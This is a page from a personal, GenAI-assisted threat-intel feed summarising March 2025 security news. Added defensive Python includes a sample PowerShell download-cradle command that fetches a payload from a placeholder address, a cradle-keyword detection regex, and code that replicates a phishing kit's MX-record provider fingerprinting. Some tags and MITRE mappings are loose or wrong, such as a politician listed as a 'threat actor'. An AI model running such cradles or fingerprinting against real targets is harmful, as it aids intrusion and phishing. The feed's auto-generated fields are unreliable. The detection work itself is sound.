For suggestions, questions, bug reports, etc. please email or ping me on LinkedIn

infosec notes

I needed a better way to stay current with cybersecurity news and filter out the noise, so I created a tiny threat intel feed. The pipeline parses relevant content and leverages GenAI to help create the dataset that feeds this website. Rows with weak intelligence (those with no threat actor, aliases, exploit, vulnerabilities, or TTP fields present) are periodically removed so the feed stays data-rich. As of 2/16/25, the dataset includes CVE severity information from CVEDetails with direct links to the relevant CVEs for more information.

Russia-Linked Gamaredon Uses Troop-Related Lures to Deploy Remcos RAT in Ukraine

Published: 2025-03-31

A new phishing campaign targeting Ukrainian entities has been linked to the Russia-based Gamaredon hacking group (also tracked as Aqua Blizzard, Armageddon, Primitive Bear, Shuckworm and UAC-0010, among other names). Cisco Talos researcher Guilherme Venere reported that Gamaredon is using "Russian words related to the movement of troops in Ukraine as a lure" in malicious LNK files disguised as Microsoft Office documents. These files, delivered via email, contain PowerShell code that downloads a second-stage ZIP archive; the archive's contents use DLL side-loading to deploy the Remcos RAT. The attack leverages "geo-fenced servers located in Russia and Germany." Gamaredon, assessed to be affiliated with Russia's FSB, is known for espionage and data theft against Ukrainian organizations since at least 2013. The impact of this campaign is the potential compromise of Ukrainian organizations, leading to data theft and further espionage activities. Separately, Silent Push detailed a similar campaign targeting Russians sympathetic to Ukraine, using lures impersonating the CIA and Ukrainian surrender hotlines, hosted on Nybula LLC, to gather personal information. "All the campaigns [...] observed have had similar traits and shared a common objective: collecting personal information from site-visiting victims," Silent Push noted. This suggests potential disinformation and intelligence-gathering operations.
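As an added example (my code, not anything from the Talos report or from this site's pipeline), here are the two detections a SOC would pair for the chain described above, run over constructed Sysmon-style events: Explorer launching PowerShell with a download cradle, which is what a double-clicked LNK looks like on the endpoint, and an unsigned DLL loaded from the same user-writable directory as a signed host executable, the side-loading pattern. A third hit fires when the side-load happens in a child of the flagged PowerShell, tying the chain together. The event shape, file paths, PIDs and the 203.0.113.10 address are all assumptions for illustration.

```python
"""Added example: flag the LNK -> PowerShell -> DLL side-load chain in endpoint events (constructed data)."""
import re
from pathlib import PureWindowsPath

# Constructed, Sysmon-like events (not real telemetry); 203.0.113.10 is a documentation address.
EVENTS = [
    {"type": "process_create", "pid": 4120, "ppid": 1234, "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -w hidden -ep bypass -c (New-Object Net.WebClient).DownloadFile("
                "'http://203.0.113.10/u.zip','C:\\Users\\victim\\AppData\\Local\\Temp\\u.zip')"},
    {"type": "process_create", "pid": 4188, "ppid": 4120,
     "parent_image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Users\victim\AppData\Local\Temp\u\viewer.exe", "cmdline": "viewer.exe"},
    {"type": "image_load", "pid": 4188, "image": r"C:\Users\victim\AppData\Local\Temp\u\viewer.exe",
     "image_signed": True, "loaded": r"C:\Users\victim\AppData\Local\Temp\u\version.dll", "loaded_signed": False},
    {"type": "image_load", "pid": 4188, "image": r"C:\Users\victim\AppData\Local\Temp\u\viewer.exe",
     "image_signed": True, "loaded": r"C:\Windows\System32\kernel32.dll", "loaded_signed": True},
    # Benign control: an admin running PowerShell from a console, parent is cmd.exe, no download cradle.
    {"type": "process_create", "pid": 5000, "ppid": 600, "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "cmdline": "powershell.exe Get-Process"},
]

# Common PowerShell download/decode cradle keywords.
CRADLE = re.compile(r"DownloadFile|DownloadString|Invoke-WebRequest|\biwr\b|FromBase64String|\bIEX\b|Invoke-Expression", re.I)
# Directories where a signed EXE loading an unsigned sibling DLL is normal rather than suspicious.
SYSTEM_DIRS = ("c:\\windows", "c:\\program files")


def _name(path):
    return PureWindowsPath(path).name.lower()


def _dir(path):
    return str(PureWindowsPath(path).parent).lower()


def is_lnk_style_cradle(ev):
    """Explorer (which is what runs a double-clicked .lnk) launching PowerShell with a download cradle."""
    return (ev["type"] == "process_create"
            and _name(ev["parent_image"]) == "explorer.exe"
            and _name(ev["image"]) in ("powershell.exe", "pwsh.exe")
            and CRADLE.search(ev["cmdline"]) is not None)


def is_side_load(ev):
    """Unsigned DLL loaded from the same user-writable directory as a signed host EXE."""
    if ev["type"] != "image_load" or not ev["loaded"].lower().endswith(".dll"):
        return False
    host_dir = _dir(ev["image"])
    return (ev["image_signed"] and not ev["loaded_signed"]
            and _dir(ev["loaded"]) == host_dir
            and not host_dir.startswith(SYSTEM_DIRS))


def detect(events):
    """Return (rule, pid) hits, adding 'full_chain' when a side-load occurs in a child of a flagged PowerShell."""
    hits, cradle_pids, parent_of = [], set(), {}
    for ev in events:
        if ev["type"] == "process_create":
            parent_of[ev["pid"]] = ev["ppid"]
        if is_lnk_style_cradle(ev):
            cradle_pids.add(ev["pid"])
            hits.append(("lnk_powershell_cradle", ev["pid"]))
        if is_side_load(ev):
            hits.append(("dll_side_load", ev["pid"]))
            if parent_of.get(ev["pid"]) in cradle_pids:
                hits.append(("full_chain", ev["pid"]))
    return hits


if __name__ == "__main__":
    for hit in detect(EVENTS):
        print(hit)
```

The side-load rule deliberately ignores Windows and Program Files, where a signed binary loading an unsigned sibling DLL is routine; tune SYSTEM_DIRS to your estate before relying on it.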

Tags: Remcos RAT, Phishing, PowerShell, DLL side-loading, Gamaredon, Russian Hacking

Categories: Threat Intelligence, Malware Analysis, Cyber Espionage

Threat Actor: Gamaredon

Actor Aliases: Aqua Blizzard, Armageddon, Blue Otso, BlueAlpha, Hive0051, Iron Tilden, Primitive Bear, Shuckworm, Trident Ursa, UAC-0010, UNC530, Winterflounder

Exploit Method: Phishing with Malicious LNK Files, PowerShell Downloader and DLL Side-Loading

MITRE ATT&CK TTP: Initial Access (TA0001) Phishing: Spearphishing Attachment (T1566.001); Execution (TA0002) User Execution: Malicious File (T1204.002); Execution (TA0002) PowerShell (T1059.001); Defense Evasion (TA0005) Hijack Execution Flow: DLL Side-Loading (T1574.002); Defense Evasion (TA0005) Deobfuscate/Decode Files or Information (T1140)

Exploited Software: Windows, PowerShell

Involved Countries: Ukraine, Russia, Germany

Affected Industries: Government/Military

170,000 Impacted by Data Breach at Chord Specialty Dental Partners

Published: 2025-03-31

Chord Specialty Dental Partners (CDHA Management and Spark DSO), a US dental service organization supporting over 60 practices, suffered a data breach impacting over 170,000 individuals. The breach stemmed from unauthorized access to employee email accounts between August 18 and September 25, 2024, as revealed in a security incident notification. The compromised accounts contained sensitive data including names, addresses, dates of birth, SSNs, driver's license numbers, bank account and payment card information, medical information, and health insurance details. While Chord "is not aware of any evidence to suggest that any information has been or will be fraudulently misused," it could not rule out that the data was accessed. The notification attributes the breach to unauthorized access to employee email accounts and does not detail the initial vector; phishing or credential stuffing would be typical for this pattern. Affected individuals are being offered credit monitoring and identity protection services. This incident follows a similar, large-scale email-based breach at Numotion, impacting nearly 500,000 individuals, highlighting the ongoing threat to healthcare data security.

Tags: Data Breach, Email Compromise, Healthcare Data Breach

Categories: Data Security Incident Response, Healthcare Cybersecurity

Exploit Method: Email Account Compromise

MITRE ATT&CK TTP: Initial Access (TA0001) Phishing (T1566); Initial Access (TA0001) Valid Accounts (T1078)

Exploited Software: Email Software (Unspecified)

Involved Countries: United States

Affected Industries: Healthcare

China cracks down on personal information collection • The Register

Published: 2025-03-31

China launched a significant crackdown on the inappropriate collection and use of personal information, targeting six areas: apps and mini-apps in social media; software development kits lacking built-in privacy features; wearables and smart home products failing to disclose data collection practices; illegal use of facial recognition; offline data collection in restaurants and stores; and illegal collection by recruiters, transport, education, medical, and accommodation providers. The Cyberspace Administration of China, Ministry of Industry and Information Technology, Ministry of Public Security, and the State Administration for Market Regulation are jointly enforcing these measures. The article notes that, "China worries operators don’t spell out rules for personal information collection…and don’t allow opting out or complaints." While no specific victims are named, the impact is widespread, affecting numerous Chinese citizens and businesses. The crackdown focuses on private entities, omitting government surveillance practices. This action highlights China’s renewed commitment to privacy regulations, although the enforcement’s effectiveness remains to be seen.

Tags: China Privacy Crackdown, Indonesia Social Media Regulation, AI-Generated Content Watermarking, Japan Airlines In-Flight AI

Categories: Government Regulation of Technology, Data Privacy and Security, AI and Emerging Technologies

Exploit Method: Inappropriate Personal Information Collection in Apps and Services

MITRE ATT&CK TTP: Collection (TA0009) Input Capture (T1056)

Exploited Software: Unspecified social media apps and mini-apps, Unspecified Software Development Kits (SDKs), Unspecified Wearables and Smart Home Products

Involved Countries: China, Indonesia, India, Japan

Affected Industries: Software Development, Wearables and Smart Home, Food Service, Retail, Recruitment, Transportation, Education, Healthcare, Accommodation, Semiconductor Assembly and Test (OSAT), Airline

GenAI turning employees into unintentional insider threats

Published: 2025-03-31

Netskope's recent report reveals a dramatic increase in enterprise data shared with Generative AI (GenAI) apps – a 30x jump in one year, reaching 7.7GB per month on average. This includes sensitive data like source code, intellectual property, and passwords, significantly increasing breach risks. James Robinson, CISO at Netskope, notes that "shadow AI" is prevalent, with "nearly three-quarters of users still accessing GenAI apps through personal accounts." This lack of control is exemplified by DeepSeek, where 91% of enterprises had users accessing it within weeks of launch, despite lacking security policies. Ray Canzanese, Director of Netskope Threat Labs, emphasizes GenAI's ubiquity, stating, "It is becoming increasingly integrated...This ubiquity presents a growing cybersecurity challenge." The shift to on-premise GenAI infrastructure, now at 54% of organizations (up from under 1%), introduces new risks like supply chain vulnerabilities and prompt injection. The report highlights that while 99% of organizations are implementing policies to mitigate risks, the widespread adoption of GenAI by employees via personal accounts creates a substantial unintentional insider threat. Ari Giguere, VP of Security and Intelligence Operations at Netskope, states that "AI isn’t just reshaping perimeter and platform security—it’s rewriting the rules." The impact includes potential data breaches, intellectual property theft, compliance violations, and the exposure of sensitive information used to train third-party AI models.
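The report is about what leaves the organization in prompts, so as an added example (my code, not Netskope's product and not anything from the report) here is the kind of pre-submission DLP check a browser extension or API gateway can run on prompt text before it reaches a GenAI app: hard secrets and source code are blocked outright, credentials embedded in otherwise ordinary text are redacted, and everything else passes. The patterns, the code-token threshold and the sample prompts are assumptions for illustration; AKIAIOSFODNN7EXAMPLE is AWS's published example access key id, not a live credential.

```python
"""Added example: a prompt DLP gate for GenAI traffic (patterns and samples are constructed)."""
import re
from dataclasses import dataclass

# Secrets that should never leave the org in a prompt. AKIA is the AWS access key id prefix.
SECRET_PATTERNS = {
    "aws_access_key_id": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "private_key_block": re.compile(r"-----BEGIN (?:RSA |EC |OPENSSH )?PRIVATE KEY-----"),
    "password_assignment": re.compile(r"(?i)\b(?:password|passwd|pwd)\s*[:=]\s*\S{6,}"),
    "bearer_token": re.compile(r"(?i)\bbearer\s+[A-Za-z0-9\-._~+/]{20,}=*"),
}
# Cheap source-code heuristic: count lines that open with a definition/import or end with ; { }.
CODE_TOKENS = re.compile(r"^\s*(?:def |class |import |from \S+ import |#include|package |func )|[;{}]\s*$", re.M)
# Findings that mean "do not send at all" rather than "send with the secret masked".
HARD_BLOCK = {"aws_access_key_id", "private_key_block", "source_code"}

# Constructed prompts (AKIAIOSFODNN7EXAMPLE is AWS's documented example key id).
SAMPLE_PROMPTS = {
    "leaked_key": ("Why does this fail?\n"
                   "def connect():\n"
                   "    import boto3\n"
                   "    return boto3.client('s3', aws_access_key_id='AKIAIOSFODNN7EXAMPLE')\n"),
    "embedded_password": "Rewrite this politely: our vpn password=Summer2024! expired again",
    "harmless": "Summarize the agenda for Tuesday's meeting.",
    "source_only": "import os\nimport sys\ndef main():\n    pass\n",
}


@dataclass
class Verdict:
    action: str      # "allow", "redact" or "block"
    findings: list   # names of the patterns/heuristics that fired
    redacted: str    # text safe to forward (empty when blocked)


def classify(prompt: str, code_threshold: int = 3) -> Verdict:
    """Decide whether a prompt may be forwarded to a GenAI app, and in what form."""
    findings = [name for name, rx in SECRET_PATTERNS.items() if rx.search(prompt)]
    if len(CODE_TOKENS.findall(prompt)) >= code_threshold:
        findings.append("source_code")
    if HARD_BLOCK & set(findings):
        return Verdict("block", findings, "")
    if findings:
        redacted = prompt
        for name in findings:
            redacted = SECRET_PATTERNS[name].sub(f"[{name} REDACTED]", redacted)
        return Verdict("redact", findings, redacted)
    return Verdict("allow", findings, prompt)


if __name__ == "__main__":
    for label, text in SAMPLE_PROMPTS.items():
        v = classify(text)
        print(f"{label:18} {v.action:7} {v.findings}")
```

Regex gates like this catch the obvious leaks (keys, key blocks, pasted code); they do not catch IP described in prose, which is why the report's numbers on personal-account usage matter more than any single filter.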

Tags: Generative AI, Insider Threats, Shadow IT, Data Security, Data Loss Prevention (DLP)

Categories: Enterprise Security, Cloud Security

Exploit Method: Data Leakage via Unsecured GenAI Apps, Prompt Injection, Shadow AI

MITRE ATT&CK TTP: Credential Access (TA0006) Unsecured Credentials (T1552); Initial Access (TA0001) Supply Chain Compromise (T1195)

Exploited Software: ChatGPT, Google Gemini, Grammarly, DeepSeek

Affected Industries: Software Development

CISA Analyzes Malware Used in Ivanti Zero-Day Attacks

Published: 2025-03-31

CISA recently published its analysis of Resurge, a SpawnChimera malware variant used in attacks exploiting a zero-day vulnerability in Ivanti Connect Secure (CVE-2025-0282). This vulnerability, a stack-based buffer overflow, allows remote code execution without authentication. Mandiant previously attributed attacks leveraging this vulnerability, patched in January 2025, to UNC5221, a China-linked espionage group. CISA's analysis reveals Resurge, dropped as 'libdsupgrade.so', possesses "capabilities of a rootkit, dropper, backdoor, bootkit, proxy, and tunneler." CISA notes that Resurge "contains a series of commands that modify files, manipulates integrity checks, and creates a web shell." Similar to SpawnChimera, it checks whether it was loaded by 'web' or 'dsmdm' to decide between creating proxies or SSH tunnels. The malware also uses 'liblogblock.so' (a SpawnSloth variant) to modify logs and a 64-bit executable, 'dsmain,' containing BusyBox applets for payload execution. The impact includes remote code execution, data exfiltration, and system compromise, potentially leading to significant data breaches and espionage. The intrusions paired exploitation of a then-unpatched vulnerability with malware built for persistence and evasion, including tampering with the appliance's own integrity checks, which is why out-of-band verification (for example running Ivanti's Integrity Checker from a clean system) rather than trusting the device's own reporting is the practical check.

Tags: Malware Analysis, Zero-Day Exploit, SpawnChimera Malware, China-linked Espionage

Categories: Vulnerability Analysis, Malware Analysis, Threat Intelligence

Threat Actor: UNC5221

Actor Aliases: none given; SpawnChimera, Resurge, SpawnAnt, SpawnMole, SpawnSnail and SpawnSloth are malware families associated with UNC5221, not names for the group

Exploit Method: SpawnChimera Malware Deployment, Resurge Malware Deployment

Vulnerabilities: CVE-2025-0282

MITRE ATT&CK TTP: Initial Access (TA0001) Exploit Public-Facing Application (T1190); Persistence (TA0003) Server Software Component: Web Shell (T1505.003); Persistence (TA0003) Pre-OS Boot: Bootkit (T1542.003); Defense Evasion (TA0005) Rootkit (T1014); Defense Evasion (TA0005) Indicator Removal (T1070); Command and Control (TA0011) Proxy (T1090); Command and Control (TA0011) Protocol Tunneling (T1572)

Exploited Software: Ivanti Connect Secure

Involved Countries: China, USA, Japan

Affected Industries: VPN

CRITICAL Vulnerabilities (1)

CVE-2025-0282
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H (base score 9.0)
EPSS: 91.52%    Percentile: 100%

An AI Image Generator’s Exposed Database Reveals What People Really Used It For | WIRED

Published: 2025-03-31

A security researcher, Jeremiah Fowler, discovered an unsecured database belonging to South Korea-based GenNomis, containing over 95,000 records of explicit AI-generated images, including AI-generated child sexual abuse material (CSAM). The database, over 45 GB in size, also included prompts used to generate the images, featuring celebrities like Ariana Grande and the Kardashians depicted as children. Fowler noted "how easy it is to create that content," highlighting the ease with which such material can be produced. The database exposed "AI-generated pornographic images of adults" and what appeared to be real photographs used to create "explicit nude or sexual AI-generated images." GenNomis' website, which offered various AI tools including an image generator, face-swapping tool, and a "NSFW" gallery, was subsequently shut down after WIRED contacted the company. Clare McGlynn, a law professor, commented on the "disturbing extent to which there is a market for AI that enables such abusive images to be generated." The incident underscores the rapid growth of AI-generated CSAM, with Derek Ray-Hill of the Internet Watch Foundation stating that "webpages containing AI-generated child sexual abuse material have more than quadrupled since 2023." The ease of generating such content, coupled with the apparent lack of moderation on GenNomis' platform, raises significant concerns about the potential for widespread abuse and the urgent need for stronger safeguards. Fowler emphasized that "the technology has raced ahead of any of the guidelines or controls."

Threat Actor: GenNomis, AI-Nomis

Exploit Method: Unsecured Database Exposure, AI-Generated CSAM Creation and Distribution

MITRE ATT&CK TTP: Collection (TA0009) Data from Information Repositories (T1213)

Exploited Software: GenNomis AI image generation tools

Involved Countries: South Korea, UK

Affected Industries: AI Image Generation

How to recognize and prevent deepfake scams

Published: 2025-03-31

Deepfakes, AI-generated videos, images, and audio, are increasingly used in scams. According to a Help Net Security article, an Entrust report revealed a deepfake attack occurred every five minutes in 2024, resulting in significant financial losses. One multinational company lost over $25 million due to a deepfake video conference call coupled with social engineering. Crypto companies suffered an average loss of $440,000 per attack. A particularly egregious example involved a French woman scammed out of €830,000 over 18 months by a scammer posing as Brad Pitt using AI-generated images. The article notes that deepfakes utilize Generative Adversarial Networks (GANs) and autoencoders. Software like DeepFaceLab and mobile apps like Zao are making deepfake creation readily accessible. The impact extends beyond financial loss, causing emotional distress and undermining trust. The article advises users to look for inconsistencies like unnatural blinking, mismatched lighting, and poor audio-visual sync to spot deepfakes. Mitigating risks involves using deepfake detection tools, staying updated on trends, implementing multi-factor authentication (MFA), establishing verification processes, and limiting personal media sharing online. As the article concludes, "No one knows what the future holds...All we can do is exercise caution and take every measure within our power to safeguard ourselves."

Tags: Deepfakes, Generative Adversarial Networks (GANs), Cybercrime, Social Engineering, Misinformation

Categories: Deepfake Detection and Prevention, Deepfake Technology and Creation, Deepfake-Related Cyberattacks

Threat Actor: Scammers

Exploit Method: Deepfake Social Engineering and Financial Fraud

MITRE ATT&CK TTP: Initial Access (TA0001) Phishing (T1566); Defense Evasion (TA0005) Impersonation (T1656)

Involved Countries: France

Affected Industries: Cryptocurrency, Multinational Companies

'Crocodilus' Android Banking Trojan Allows Device Takeover, Data Theft

Published: 2025-03-31

ThreatFabric has identified a new Android banking trojan, Crocodilus, capable of advanced device takeover and data theft. Targeting users in Spain and Turkey, Crocodilus uses a dropper bypassing Android 13 restrictions and requesting Accessibility Services permissions for complete device control. As ThreatFabric explains, "Crocodilus will enumerate all the elements displayed on the screen in Google Authenticator app, capture the text displayed...and send these to the C&C, allowing timely theft of OTP codes for the operators." The malware employs keylogging, overlay attacks, and remote access capabilities, enabling threat actors to steal credentials and conduct fraudulent transactions. It also uses social engineering, displaying messages urging victims to back up their cryptocurrency wallet keys after stealing them. While linked to the threat actor ‘sybra’, previously associated with malware like MetaDroid, Hook, and Octo, Crocodilus's code suggests a different developer, possibly Turkish-speaking. The impact includes financial losses for victims and potential extensive data breaches. The malware's ability to bypass security measures and its sophisticated techniques highlight the evolving nature of mobile threats.

Tags: Android Malware, Banking Trojan, Data Theft, Remote Access Trojan (RAT), Social Engineering

Categories: Mobile Security, Malware Analysis

Threat Actor: sybra, Turkish-speaking developer

Exploit Method: Accessibility Service Exploitation, Android 13+ Bypass

MITRE ATT&CK TTP (Mobile matrix): Input Capture: Keylogging (T1417.001); Input Capture: GUI Input Capture (T1417.002); Screen Capture (T1513); Input Injection (T1516)

Exploited Software: Android, Google Authenticator

Involved Countries: Spain, Turkey

Affected Industries: Banking, Cryptocurrency

Morphing Meerkat phishing kits exploit DNS MX records

Published: 2025-03-31

A March 31, 2025, Security Affairs roundup leads with the Morphing Meerkat phishing kits, which abuse DNS MX records: when a victim opens the phishing page, client-side script looks up the MX record of the victim's email domain (using DNS over HTTPS, so the query goes to a public resolver rather than through the victim's own DNS) to identify the mail provider, then renders a fake login page matching that provider's real sign-in portal. The operator never has to guess whether the target uses Gmail, Microsoft 365, Yahoo or a hosted mail service; the kit picks the right template on the fly. The article does not name victims of this campaign. It also surveys other recent incidents: ransomware attacks on Sam's Club (claimed by Cl0p), the Virginia Attorney General's Office (Cloak ransomware), Astral Foods (over $1 million in losses) and Ukraine's national railway operator Ukrzaliznytsia; the Crocodilus, Grandoreiro and Mamont banking trojans; exploitation of vulnerabilities in software from VMware, Google Chrome, Sitecore, Next.js and Apache Tomcat; supply chain attacks on GitHub Actions; and the ABYSSWORKER malicious Windows driver used by Medusa ransomware to disable security tools. The article states that "Crooks are reviving the Grandoreiro banking trojan," showing the persistence of older threats alongside emerging ones.
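As an added example (my code, not the kit's own script and not from the Security Affairs article), here are the two halves of the MX trick a defender should understand: how a page fingerprints the victim's mail provider from a DNS over HTTPS JSON answer for the MX record, and a proxy-log check that flags browser-originated DoH MX lookups, which are rare outside phishing kits. The provider suffix table, the resolver list, the log line format, the `victim-corp.example` domain and the addresses are assumptions for illustration.

```python
"""Added example: MX-record provider fingerprinting (as a phishing kit does it) and a proxy-log detection."""
import json
from urllib.parse import urlsplit, parse_qs

# Assumed mapping from MX hostname suffix to the login template a kit would serve.
MX_PROVIDERS = {
    ".google.com.": "gmail",            # aspmx.l.google.com
    ".googlemail.com.": "gmail",
    ".outlook.com.": "microsoft365",    # *.mail.protection.outlook.com
    ".yahoodns.net.": "yahoo",
    ".pphosted.com.": "proofpoint-fronted",
    ".mimecast.com.": "mimecast-fronted",
}
# Public DoH resolvers whose JSON APIs a page can call from the browser.
DOH_RESOLVERS = ("cloudflare-dns.com", "dns.google", "dns.quad9.net")
DOH_PATHS = ("/dns-query", "/resolve")

# Constructed DoH JSON answer (the shape Cloudflare's and Google's JSON APIs return); type 15 is MX.
DOH_ANSWER = json.dumps({
    "Status": 0,
    "Answer": [
        {"name": "victim-corp.example", "type": 15, "TTL": 300,
         "data": "10 victim-corp-example.mail.protection.outlook.com."},
        {"name": "victim-corp.example", "type": 1, "TTL": 300, "data": "192.0.2.1"},
    ],
})

# Constructed proxy log lines: "<client> <url> <referer>".
PROXY_LOG = [
    "10.0.0.5 https://cloudflare-dns.com/dns-query?name=victim-corp.example&type=MX "
    "https://docs-share-login.example/view?e=bob@victim-corp.example",
    "10.0.0.7 https://dns.google/resolve?name=example.org&type=A https://example.org/",
    "10.0.0.9 https://www.example.com/index.html -",
]


def mx_hosts_from_doh(doh_json: str) -> list:
    """Return MX exchange hostnames from a DoH JSON answer, lowest preference (most used) first."""
    doc = json.loads(doh_json)
    rows = []
    for rr in doc.get("Answer", []):
        if rr.get("type") != 15:
            continue
        pref, _, host = rr["data"].partition(" ")
        host = host.lower()
        if not host.endswith("."):
            host += "."
        rows.append((int(pref), host))
    return [host for _, host in sorted(rows)]


def provider_for(mx_hosts: list) -> str:
    """Map the first recognised MX host to a provider; unknown hosts fall back to a generic template."""
    for host in mx_hosts:
        for suffix, provider in MX_PROVIDERS.items():
            if host.endswith(suffix):
                return provider
    return "generic"


def flag_doh_mx_lookups(log_lines) -> list:
    """Flag (client, queried name, referer) for DoH MX queries issued by a browser; ordinary pages never do this."""
    hits = []
    for line in log_lines:
        client, url, referer = line.split(" ", 2)
        u = urlsplit(url)
        if u.hostname not in DOH_RESOLVERS or u.path not in DOH_PATHS:
            continue
        q = parse_qs(u.query)
        if q.get("type", [""])[0].upper() in ("MX", "15"):
            hits.append((client, q.get("name", [""])[0], referer))
    return hits


if __name__ == "__main__":
    hosts = mx_hosts_from_doh(DOH_ANSWER)
    print("MX:", hosts, "->", provider_for(hosts))
    for hit in flag_doh_mx_lookups(PROXY_LOG):
        print("DoH MX lookup from browser:", hit)
```

The detection only sees cleartext URLs when the proxy terminates TLS; where it does not, the equivalent signal is a browser process resolving a public DoH resolver and then the domain part of an address that appeared in a URL parameter, and the referer in the hit above is the page to pull apart.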

Threat Actor: Morphing Meerkat

Exploit Method: Morphing Meerkat Phishing Kits exploiting DNS MX records

MITRE ATT&CK TTP: Initial Access (TA0001) Phishing: Spearphishing Link (T1566.002); Collection (TA0009) Input Capture: Web Portal Capture (T1056.003)

Exploited Software: WordPress

Involved Countries: United Kingdom, United States

Affected Industries: Internet Service Providers (ISPs), Technology

How Each Pillar of the 1st Amendment is Under Attack – Krebs on Security

Published: 2025-03-31

President Trump's second term has seen unprecedented attacks on the First Amendment, targeting all five of its pillars. The administration's actions, as detailed in Krebs on Security, include firing staff processing Freedom of Information Act (FOIA) requests ("President Trump recently fired most of the people involved in processing Freedom of Information Act (FOIA) requests for government agencies"), using Signal for discussions to avoid creating a lasting record ("Intentional or not, use of Signal in this context was an act of erasure"), and issuing executive orders against law firms that represented those who sued him (Skadden, Arps, Slate, Meagher & Flom; Paul, Weiss, Rifkind, Wharton & Garrison; Jenner & Block; and WilmerHale). Judges Richard Leon and James Boasberg blocked some of these orders, prompting Trump to call for their impeachment; Chief Justice John Roberts rebuked this ("impeachment is not an appropriate response to disagreement concerning a judicial decision"). House Speaker Mike Johnson threatened to eliminate federal courts ("We can eliminate an entire district court"). The administration also discourages protests, threatening funding cuts to universities and targeting pro-Palestinian students; Secretary of State Marco Rubio revealed at least 300 foreign student visas were revoked. Trump sued multiple news outlets (60 Minutes, CNN, The Washington Post, The New York Times, The Des Moines Register, and ABC News) over negative coverage, and some defendants settled: Disney, ABC's parent, paid $15 million, and Meta settled a separate suit for $25 million. The FCC, under Brendan Carr, reopened investigations into several networks. The administration also restricted speech within government, removing data sets from websites ("hundreds of terabytes of digital resources analyzing data have been taken off government websites"), and freezing funding for programs promoting "Marxist equity, transgenderism, and green new deal social engineering policies."
Additionally, funding for the U.S. Agency for Global Media (USAGM) was cut, impacting outlets like Radio Free Europe/Radio Liberty and Voice of America, though Judge Royce Lamberth temporarily blocked this. Finally, a policy change allowed immigration enforcement in churches, affecting religious freedom and prompting criticism from Rev. Paul Brandeis Raushenbush and Americans United for Separation of Church and State. The article suggests Trump's actions are influenced by Hungarian Prime Minister Viktor Orbán's tactics.

Threat Actor: President Trump

Actor Aliases: POTUS

Exploit Method: Use of Signal for Concealing Government Communications, Strategic Lawsuits Against Public Participation (SLAPP), Weaponization of Federal Funding and Resources

MITRE ATT&CK TTP: Defense Evasion (TA0005) Impair Defenses (T1562); Defense Evasion (TA0005) Indicator Removal (T1070)

Exploited Software: Signal

Involved Countries: Hungary, Venezuela, Yemen, Israel

Affected Industries: Media, Legal Services, Higher Education

Page 1 of 50
Showing articles 1 to 10 of 500 newest articles